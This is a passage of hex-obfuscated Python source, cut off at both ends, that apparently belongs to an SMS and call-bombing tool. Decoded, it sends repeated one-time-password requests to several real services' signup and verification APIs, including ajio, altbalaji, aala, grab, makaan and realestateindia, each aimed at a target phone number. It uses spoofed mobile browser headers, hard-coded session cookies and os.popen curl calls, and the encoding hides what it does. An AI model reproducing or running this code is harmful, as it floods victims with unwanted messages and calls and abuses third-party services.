x22\x53\x70\x65\x65\x64\x58\x22\x2c\x22\x6c\x6f\x67\x69\x6e\x22\x3a\x22\x6a\x6f\x68\x6e\x79\x61\x68\x6f\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x22\x2c\x22\x70\x61\x73\x73\x77\x6f\x72\x64\x22\x3a\x22\x52\x6f\x63\x6b\x40\x35\x73\x74\x61\x72\x22\x2c\x22\x67\x65\x6e\x64\x65\x72\x54\x79\x70\x65\x22\x3a\x22\x4d\x61\x6c\x65\x22\x2c\x22\x6d\x6f\x62\x69\x6c\x65\x4e\x75\x6d\x62\x65\x72\x22\x3a\x22\x30\x30\x30\x30\x22\x2c\x22\x72\x65\x71\x75\x65\x73\x74\x54\x79\x70\x65\x22\x3a\x22\x53\x45\x4e\x44\x4f\x54\x50\x22\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x61\x75\x74\x68\x2f\x73\x69\x67\x6e\x75\x70\x53\x65\x6e\x64\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x5c\x22\x73\x74\x61\x74\x75\x73\x43\x6f\x64\x65\x5c\x22\x3a\x5c\x22\x31\x5c\x22\x22\x29\x20\x21\x3d\x20\x2d\x31\x3a\x0a\x20\x20
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x34\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x61\x70\x69\x2e\x63\x6c\x6f\x75\x64\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x20\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6c\x69\x74\x65\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x38\x39\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43
\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x3b\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6c\x69\x74\x65\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x2f\x73\x75\x62\x73\x63\x72\x69\x62\x65\x3f\x70\x72\x6f\x67\x72\x65\x73\x73\x3d\x69\x6e\x70\x75\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x22\x3a\x63\x63\x2c\x22\x70\x68\x6f\x6e\x65\x5f\x6e\x75\x6d\x62\x65\x72\x22\x3a\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x63\x6c\x6f\x75\x64\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x76\x65\x72\x69\x66\x79\x3f\x64\x6f\x6d\x61\x69\x6e\x3d\x49\x4e\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x20\x3d\x3d
\x20\x27\x32\x34\x66\x34\x36\x37\x62\x32\x34\x30\x38\x37\x66\x66\x34\x38\x63\x39\x36\x33\x32\x31\x37\x38\x36\x64\x38\x39\x63\x36\x39\x66\x27\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x35\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x66\x72\x6f\x6e\x74\x65\x6e\x64\x27\x3a\x20\x27\x61\x32\x37\x6d\x6e\x33\x68\x33\x69\x72\x74\x31\x72\x6c\x74\x36\x69\x35\x35\x73\x39\x33\x70\x39\x72\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x72\x6f\x6e\x74\x65\x6e\x64\x5f\x63\x69\x64\x27\x3a\x20\x27\x38\x7a\x71\x42\x42\x7a\x77\x51\x54\x4d\x49\x74\x39\x55\x4b\x67\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x42\x45\x41\x4d\x45\x52\x5f\x55\x53\x45\x52\x5f\x49\x44\x5f\x67\x41\x44\x72\x79\x63\x42\x6e\x31\x32\x38\x37\x30\x27\x3a\x20\x27\x63\x39\x66\x65\x34\x66\x37\x64\x2d\x62\x34\x32\x31\x2d\x34\x62\x61\x64\x2d\x39\x63\x66\x32\x2d\x30\x61\x34\x64\x62\x37\x31\x36\x64\x66\x66\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x27\x3a\x20\x27\x67\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x31\x30\x31\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c
\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x2c\x61\x72\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x65\x6d\x61\x69\x6c\x27\x3a\x20\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x69\x72\x73\x74\x6e\x61\x6d\x65\x27\x3a\x20\x27\x53\x70\x65\x65\x64\x58\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x61\x73\x74\x6e\x61\x6d\x65\x27\x3a\x20\x27\x53\x70\x65\x65\x64\x58\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x2f\x61\x63\x63\x75\x73\x74\x6f\x6d\x65\x72\x2f\x61\x6a\x61\x78\x2f\x67\x65\x74\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x27\x63\x6f\x64\x65\x3a\x27\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x36\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x65\x74\x68\x6f\x64\x27\x3a\x20\x27\x53\x4d\x53\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x75\x6e\x74\x72\x79\x43\x6f\x64\x65\x27\x3a\x20\x27\x69\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x70\x68\x6f\x6e\x65\x4e\x75\x6d\x62\x65\x72\x27\x3a\x20\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27
\x74\x65\x6d\x70\x6c\x61\x74\x65\x49\x44\x27\x3a\x20\x27\x70\x61\x78\x5f\x61\x6e\x64\x72\x6f\x69\x64\x5f\x70\x72\x6f\x64\x75\x63\x74\x69\x6f\x6e\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x67\x72\x61\x62\x2e\x63\x6f\x6d\x2f\x67\x72\x61\x62\x69\x64\x2f\x76\x31\x2f\x70\x68\x6f\x6e\x65\x2f\x6f\x74\x70\x27\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x47\x45\x54\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6d\x61\x6b\x61\x61\x6e\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x73\x2f\x6e\x63\x2f\x73\x65\x6e\x64\x4f\x74\x70\x4f\x6e\x43\x61\x6c\x6c\x2f\x31\x36\x32\x35\x37\x30\x36\x35\x2f\x27\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x6e\x20\x2b\x20\x27\x3f\x63\x61\x6c\x6c\x54\x79\x70\x65\x3d\x6f\x74\x70\x4f\x6e\x43\x61\x6c\x6c\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x6e\x65\x77\x20\x6f\x74\x70\x20\x68\x61\x73\x20\x62\x65\x65\x6e\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x64\x20\x6d\x6f\x62\x69\x6c\x65\x3d\x25\x32\x42\x27\x20\x2b\x20\x63\x63\x20\x2b\x20\x27\x2d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x20\x20\x20\x20\x20\x27\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x72\x6b\x65\x74\x69\x6e\x67\x2e\x74\x6c\x6c\x6d\x73\x2e\x63\x6f\x6d\x2f\x65\x6c\x65\x61\x72\x6e\x2f\x61\x70\x69\x2f\x76\x34\x2f\x61\x75\x74\x68\x65\x6e\x74\x69\x63\x61\x74\x69\x6f\x6e\x73\x2f\x70\x68\x6f\x6e\x65\x5f\x63\x61\x6c\x6c\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x6f\x74\x70\x20\x72\x65\x71\x75\x65\x73\x74\x73\x20\x65\x78\x63\x65\x65\x64\x65\x64\x22\x29\x20\x3d\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x35\x38\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x3a\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x22\x20\x2d\x48\x20\x22\x6f\x72\x69\x67\x69\x6e\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x78\x2d\x72\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x77\x69\x74\x68\x3a\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x22\x20\x2d\x48\x20\x22\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x3a\x6f\x6e\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68
\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x22\x20\x2d\x48\x20\x22\x72\x65\x66\x65\x72\x65\x72\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x2f\x74\x68\x61\x6e\x6b\x73\x2e\x70\x68\x70\x3f\x6e\x65\x77\x72\x65\x67\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x74\x3d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x6d\x6f\x62\x69\x6c\x65\x5f\x76\x65\x72\x69\x66\x79\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x65\x6d\x61\x69\x6c\x5f\x76\x65\x72\x69\x66\x79\x5f\x73\x74\x61\x74\x75\x73\x3d\x4e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x62\x6c\x6f\x63\x6b\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x63\x6f\x75\x6e\x74\x72\x79\x3d\x49\x4e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x70\x61\x69\x64\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d
\x62\x65\x72\x5f\x74\x79\x70\x65\x3d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x65\x6d\x61\x69\x6c\x3d\x46\x61\x6b\x65\x6d\x61\x6d\x25\x34\x30\x72\x69\x6c\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x6e\x61\x6d\x65\x3d\x46\x61\x6b\x65\x6d\x61\x6e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x69\x64\x3d\x31\x35\x34\x37\x30\x34\x35\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x63\x6f\x6f\x6b\x69\x5f\x73\x65\x73\x73\x5f\x69\x64\x3d\x39\x71\x38\x62\x73\x75\x63\x6a\x36\x6d\x67\x76\x75\x32\x64\x63\x30\x33\x62\x66\x73\x76\x6c\x66\x30\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6e\x61\x6d\x65\x3d\x39\x71\x38\x62\x73\x75\x63\x6a\x36\x6d\x67\x76\x75\x32\x64\x63\x30\x33\x62\x66\x73\x76\x6c\x66\x30\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x69\x64\x3d\x47\x41\x31\x2e\x32\x2e\x